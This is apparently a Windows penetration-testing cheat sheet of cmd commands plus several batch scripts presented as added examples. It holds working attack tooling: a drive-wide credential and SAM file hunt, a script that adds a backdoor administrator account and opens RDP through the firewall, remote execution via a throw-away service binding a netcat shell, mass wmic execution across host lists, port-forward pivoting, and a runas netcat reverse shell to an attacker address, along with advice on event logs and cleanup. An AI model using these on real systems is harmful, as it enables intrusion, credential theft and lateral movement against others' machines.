# 1 Windows cmd kungfu

## Read Files

```
type myfile                  ..display
type *.txt                   ..multiple
type my1 my2                 ..multiple
type my1 | find /i "pass"    ..search-in-file
type my1 | findstr [regex]   ..regex
more my1                     ..onepage-at-a-time
```

## Environment

```
set           ..view env vars
set path      ..view path
set username  ..view username (prints every variable starting with "username")
```

## Search

* /b - bare (paths only, no headers or sizes; easy to pipe)
* /s - recurse into subdirectories
* wildcards in the file name are supported (`*pass*`); add `2>nul` to drop "Access is denied" lines

```
dir /b /s mydir\file
dir /b /s c:\pass.txt          ..search all of c: for 'pass.txt', subfolders included
dir /b /s %systemroot%\hosts   ..find the hosts file
```
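
The search and read commands above combined into one credential hunt, as an added batch example that is not part of the original page. The name patterns, file types, starting folder and the list of well-known credential files are assumptions to tune per target:

```batch
@echo off
REM Added example, not from the original page: combine the dir /b /s and
REM findstr idioms into one credential hunt. Name patterns, file types and
REM the starting folders are assumptions; tune them to the target.
setlocal

REM 1. Files whose NAME looks interesting, anywhere on C:. dir accepts wildcards
REM    in the last path element and /s walks every subfolder; 2>nul hides the
REM    "File Not Found" / "Access is denied" noise.
for %%p in (*pass* *cred* unattend*.xml web.config *.kdbx *.rdp) do (
    dir /b /s "C:\%%p" 2>nul
)

REM 2. Files whose CONTENT mentions a password. /s recurse, /i ignore case,
REM    /m print matching file names only, /c:"..." treat the pattern literally.
REM    Starting at C:\Users keeps the run short; use C:\ for a full sweep.
pushd C:\Users
findstr /s /i /m /c:"password" *.txt *.ini *.xml *.config *.ps1 *.bat *.cmd 2>nul
popd

REM 3. Well-known places Windows itself drops credentials (paths are real;
REM    most are absent on a clean host). SAM is locked, but "if exist" still sees it.
for %%f in (
    "%SYSTEMROOT%\Panther\Unattend.xml"
    "%SYSTEMROOT%\Panther\Unattend\Unattend.xml"
    "%SYSTEMROOT%\System32\sysprep\sysprep.xml"
    "%SYSTEMROOT%\repair\SAM"
    "%SYSTEMROOT%\System32\config\SAM"
) do if exist %%f echo [+] %%~f

endlocal
```

Save as `hunt.cmd` and run from a normal prompt; nothing in it needs admin, it only reads. A full-drive `findstr /s` over `C:\` can take minutes on a busy file server, so narrow the file types before widening the start folder.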

## Software Inventory Search

```
dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"
```

## Windows Users

```
net user                                   ..list local accounts
net user mike p$$wrd /add                  ..create (local account, password set now)
net user mike /del                         ..delete

net localgroup                             ..list local groups
net localgroup administrators              ..members of the local Administrators group
net localgroup administrators mike /add    ..promote
net localgroup administrators mike /del    ..demote
```

## AD Lockout Settings

```
net accounts /domain
```

## RDP Trick

* REF: [PrivEscWin-Churrasco](/07-win-privesc/win-privesc.md#churrasco)

```
> net user
> net user mikes hacks /add
> net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy    ..CONNECT WITH RDP !!!
```
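
The whole RDP procedure above as one added batch script, not code from the original page. It adds the two steps the snippet leaves out (the host-firewall rule group and, optionally, switching off Network Level Authentication for older clients) and verifies the result. The user name, password and host are placeholders carried over from the snippet; run it from an elevated prompt on the target:

```batch
@echo off
REM Added example, not from the original page: account + group + registry +
REM firewall + verification for the RDP trick. User/password are placeholders.
setlocal
set "U=mikes"
set "P=hacks"

net user %U% %P% /add                     || goto :fail
net localgroup administrators %U% /add    || goto :fail

REM 0 = allow inbound Terminal Services connections
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f || goto :fail

REM The built-in "Remote Desktop" rule group is usually disabled: without this,
REM the service listens on 3389 but the host firewall drops the connection.
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

REM Optional: disable NLA (UserAuthentication=0) when the client cannot do
REM CredSSP; leave it on if you can use a modern client such as xfreerdp.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

REM Verify: service running, port bound, account really in the group
sc query TermService | find "RUNNING"
netstat -an | find ":3389"
net localgroup administrators | find /i "%U%"
goto :eof

:fail
echo [-] a step failed (elevated prompt? password policy?)
exit /b 1
```

Each of these steps is loud: a new local account and a group change produce security events 4720 and 4732, and the registry and firewall changes are visible to any EDR, so on an engagement prefer existing credentials where they will do. From Kali, `xfreerdp /u:mikes /p:hacks /v:legacy` is the drop-in for the `rdesktop` line above and handles NLA.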

## Windows Password policy

```
net accounts                 ..local policy: lockout threshold/duration, min length, max age
net accounts /domain         ..same, as set by the domain (ask before password spraying)
wmic useraccount list brief  ..every account with SID, domain and disabled/locked status
```

## Windows registry

```
reg query key1                       ..key1 = hive\path, e.g. HKLM\SOFTWARE\...
reg query \\mypc\HKLM\key1           ..remote: host goes in front of the hive, not in front of "query"
                                     ..(needs an SMB session and the Remote Registry service on mypc)
reg add key1 /v value /t type /d data /f   ../f = overwrite without the "Yes/No" prompt
reg export key1 key.reg              ..back up before you change anything
reg import key.reg                   ..merge it back (adds/overwrites, does not delete)
```
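
An added batch example, not from the original page, of the export / add / query / undo cycle for `reg.exe` plus the remote form. The key name, value name and host `mypc` are assumptions; HKCU is used so the local part runs without admin rights:

```batch
@echo off
REM Added example, not from the original page: the export/add/query/undo cycle
REM for reg.exe, plus the correct remote form. Key name, value name and the
REM host "mypc" are assumptions. HKCU is used so it runs without admin rights.
setlocal
set "KEY=HKCU\Software\KungfuExample"
set "BK=%TEMP%\KungfuExample.reg"

REM 1. Export before touching anything (/y overwrites an old backup file).
REM    Fails harmlessly if the key does not exist yet.
reg export "%KEY%" "%BK%" /y >nul 2>&1 && echo [+] backup written to %BK%

REM 2. Write a DWORD; /f skips the "overwrite?" prompt.
reg add "%KEY%" /v ExampleValue /t REG_DWORD /d 1 /f

REM 3. Read back exactly that value (/v) instead of dumping the whole key.
reg query "%KEY%" /v ExampleValue

REM 4. Remote: the host goes in front of the hive, not in front of "query".
REM    Needs an SMB session (net use \\mypc /user:...) and the Remote Registry
REM    service running on mypc. Run-key autostarts are a typical thing to pull.
reg query "\\mypc\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 2>nul

REM 5. Undo: drop what we added, then merge the backup back in (import only
REM    adds/overwrites, which is why the delete comes first).
reg delete "%KEY%" /v ExampleValue /f
if exist "%BK%" reg import "%BK%"
endlocal
```

The delete-then-import order matters: `reg import` never removes values, so importing the backup on its own would leave the added value in place.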

## Windows smb

* REF: [MoveFilesSMB](/06-linux-privesc/04-transfer-files.md#smb)

```
session (authenticate to the host without mapping a drive; later sc/reg/psexec \\IP calls reuse it):
net use \\IP pw /u:bob

mount (* = next free drive letter):
net use * \\IP\share pw /u:bob
net use \\IP /del
net use * /del /y

may need a qualified name (/u: is short for /user:):
/u:machinename\bob   or   /u:domain\bob
```

## Windows services

```
sc query                       ..running services
sc query state= all            ..all services (the space after "state=" is required)
sc qc svcname                  ..config: binary path, start type, logon account
sc \\10.0.0.5 qc mysvc         ..remote (needs an SMB session to the host first)
sc start mysvc
sc config mysvc start= demand  ..auto / demand / disabled
sc stop mysvc
services.msc                   ..gui

wmic (the class name "service" must come before the where clause):
wmic service where (displayname like "%hello%") get name
```
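
Service triage with `sc` and `wmic`, as an added batch example that is not part of the original page. It lists services, dumps one definition, shows the `wmic service where` form correctly, and runs the unquoted-service-path check the `wmic` where clause is usually used for. `mysvc` and the `hello` pattern are assumptions. Note that `wmic.exe` is deprecated and missing on current Windows 11 builds; there `Get-CimInstance Win32_Service` gives the same data:

```batch
@echo off
REM Added example, not from the original page: service triage with sc.exe and
REM wmic, including the unquoted-path check. "mysvc" and "hello" are assumptions.
setlocal

REM Names of every installed service, running or not ("state= all" needs the space)
sc query state= all | findstr /i "SERVICE_NAME"

REM Full definition of one service: binary path, start type, logon account
sc qc mysvc

REM wmic: the class name "service" goes before the where clause. %% because
REM this is a batch file; on an interactive prompt write a single % each.
wmic service where (displayname like "%%hello%%") get name,pathname,startmode,startname

REM Auto-start services outside %SystemRoot% whose binary path is NOT quoted.
REM A space in such a path ("C:\Program Files\My App\svc.exe") makes the SCM
REM try C:\Program.exe first; a writable parent folder then gives code
REM execution as the service account. The last filter drops any line that
REM contains a double quote, i.e. paths that are already quoted.
wmic service get name,pathname,startmode 2>nul | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

REM Change start type and bounce a service (needs admin)
sc config mysvc start= demand
sc stop mysvc
sc start mysvc
endlocal
```

The unquoted-path line is a screening filter, not a verdict: each hit still needs an `icacls` look at the parent folders to see whether the current user can actually write there.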

## Windows psexec

```
net use \\$IP /u:bob                    ..get smb session (or pass -u/-p to psexec instead)
psexec \\$IP -u bob -p pass -d command  ..-d: return immediately, don't wait for the command to finish
psexec \\$IP ipconfig                   ..run one command, see its output
psexec \\$IP cmd.exe                    ..interactive shell on the target
psexec \\$IP -s cmd.exe                 ..-s: run as SYSTEM (add -d to detach/background; options go before the command)
                                        ..psexec copies PSEXESVC.exe to ADMIN$ and installs a service (event 7045): noisy
```

## Windows schedule tasks

```
schtasks /query /s $IP /u bob /p pass
schtasks /create /tn taskname /s $IP /u bob /p pass /sc freq /st stime /sd sdate /tr command

schtasks /create /tn taskname /s $IP /u bob /p pass /ru SYSTEM /sc HOURLY /st stime /sd sdate /tr command   ..task runs as SYSTEM

/sc  MINUTE | HOURLY | DAILY | WEEKLY | MONTHLY | ONCE | ONSTART | ONLOGON | ONIDLE
/st  HH:MM (24h)        /sd  date in the target's locale format (usually MM/DD/YYYY)
```

## Windows Services & Processes

```
net use \\$IP /u:bob  ..get smb session first!!
sc \\$IP query schedule                             ..is the Task Scheduler service running?
sc \\$IP create svcnm binpath= mycmd                ..not a real service: SCM gives up after ~30 s (error 1053)
sc \\$IP create svcnm binpath= "cmd.exe /k mycmd"   ..cmd.exe is the service process and is killed on that timeout
sc \\$IP create ncsvc binpath= "cmd.exe /k c:\Tools\nc.exe -lp 4444 -e cmd.exe"   ..connect within the window

sc \\$IP start svcnm   ..blocks ~30 s, then reports 1053; the command has already run
net time \\$IP         ..remote clock, for scheduling

or 'ServifyThis'

wmic /node:10.x.x.x /user:bobadmin /password:p@ss process call create "[command]"   ..no slash after /node:, quote the command

Multiple hosts (one IP per line in the file):
wmic /node:@C:\tmp\iplist /user:bob /password:paxx process call create "[command]"

Look at processes:
wmic /node:$IP /user:bob /password:paxx process list brief
wmic /node:$IP /user:bob /password:paxx process where processid="PID" delete
wmic /node:$IP /user:bob /password:paxx process where name="[name]" delete
```
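
Remote execution through a throw-away service and through `wmic`, with the cleanup the snippets above skip, as an added batch example that is not part of the original page. It also serves the psexec and schtasks sections: all three ride on the same SMB session. Target address, credentials, listener port and the `nc.exe` path are assumptions:

```batch
@echo off
REM Added example, not from the original page: remote execution through a
REM throw-away service and through wmic, with cleanup. Target, credentials,
REM payload path and listener port are assumptions.
setlocal
set "T=10.10.10.5"
set "SVC=kf%RANDOM%"

REM 1. Authenticate once; every sc.exe \\host call below reuses this SMB session.
net use \\%T% /user:bobadmin p@ss || exit /b 1

REM 2. cmd.exe is not a real service: the SCM waits ~30 s for it to check in,
REM    then reports error 1053 and terminates the service process. "start /b"
REM    hands the listener to a separate process so that timeout does not take
REM    it down. Keep the whole binpath= value in one pair of quotes.
sc \\%T% create %SVC% binpath= "cmd.exe /c start /b c:\Tools\nc.exe -lp 4444 -e cmd.exe" start= demand
sc \\%T% start %SVC%
REM    (the line above prints error 1053 after ~30 s: expected)

REM 3. The definition stays behind otherwise; remove it, the listener keeps running.
sc \\%T% delete %SVC%

REM 4. wmic alternative: no service artefact, returns ReturnValue and the new PID.
REM    /node:host has no slash before the address; quote the whole command.
wmic /node:%T% /user:bobadmin /password:p@ss process call create "cmd.exe /c whoami > C:\Windows\Temp\who.txt"

REM 5. Same against a list of hosts (one per line), then confirm the listener.
wmic /node:@C:\tmp\iplist /user:bobadmin /password:p@ss process call create "cmd.exe /c whoami > C:\Windows\Temp\who.txt"
wmic /node:%T% /user:bobadmin /password:p@ss process list brief | findstr /i "nc.exe"

net use \\%T% /del
endlocal
```

Both routes leave logs: the service path writes event 7045 (new service installed) and 7009/7000 for the timeout, the `wmic` path shows up as a child of `WmiPrvSE.exe` on the target. `sc delete` removes only the definition, not whatever the service spawned.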

## Windows Firewall

```
netsh /?   ..top-level help (network settings live under netsh interface ip show config)
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off     ..blunt and noisy; prefer one scoped rule
netsh advfirewall firewall add rule name="Comment" dir=in action=allow remoteip=$IP protocol=TCP localport=23
netsh advfirewall firewall delete rule name="Comment"

Port-forward (needs the IP Helper service running; listens on all interfaces unless listenaddress= is given):
netsh interface portproxy add v4tov4 listenport=8000 connectport=80 connectaddress=$IP
```
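
The firewall and portproxy commands above as one added batch example, not code from the original page: open one port to one peer with the correct `remoteip=` key, verify it, set up a pivot with its own rule, then remove everything. The peer address, forward target and rule names are assumptions; it needs an elevated prompt:

```batch
@echo off
REM Added example, not from the original page: scoped allow rule, portproxy
REM pivot, verification and undo. Addresses and rule names are assumptions.
setlocal
set "PEER=10.10.14.3"
set "RULE=kf-allow-23"

REM Inbound TCP/23 from the attacker box only (the key is remoteip, not remoteid)
netsh advfirewall firewall add rule name="%RULE%" dir=in action=allow protocol=TCP localport=23 remoteip=%PEER%
netsh advfirewall firewall show rule name="%RULE%"

REM Pivot: connections to this host on 8000 are forwarded to 10.10.10.20:80.
REM listenaddress=0.0.0.0 binds every interface. portproxy relies on the
REM IP Helper service (iphlpsvc); the host firewall still needs a rule for 8000.
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8000 connectaddress=10.10.10.20 connectport=80
netsh advfirewall firewall add rule name="%RULE%-8000" dir=in action=allow protocol=TCP localport=8000 remoteip=%PEER%
netsh interface portproxy show v4tov4
netstat -an | find ":8000"

REM Undo: leave the host as you found it
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8000
netsh advfirewall firewall delete rule name="%RULE%-8000"
netsh advfirewall firewall delete rule name="%RULE%"
endlocal
```

`netsh interface portproxy show v4tov4` is also the first place to look on a host you are investigating: a forward nobody remembers adding is a classic persistence and pivot artefact.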

## runas

* Creates a reverse shell from a Windows server to Kali, running as another local user
* Uses netcat for Windows and runas.exe. runas has no password switch and always prompts, so this needs an interactive session; for non-interactive use take psexec -u/-p or schtasks /ru /rp instead

```
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nv $IP 4444 -e cmd.exe"

Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
```
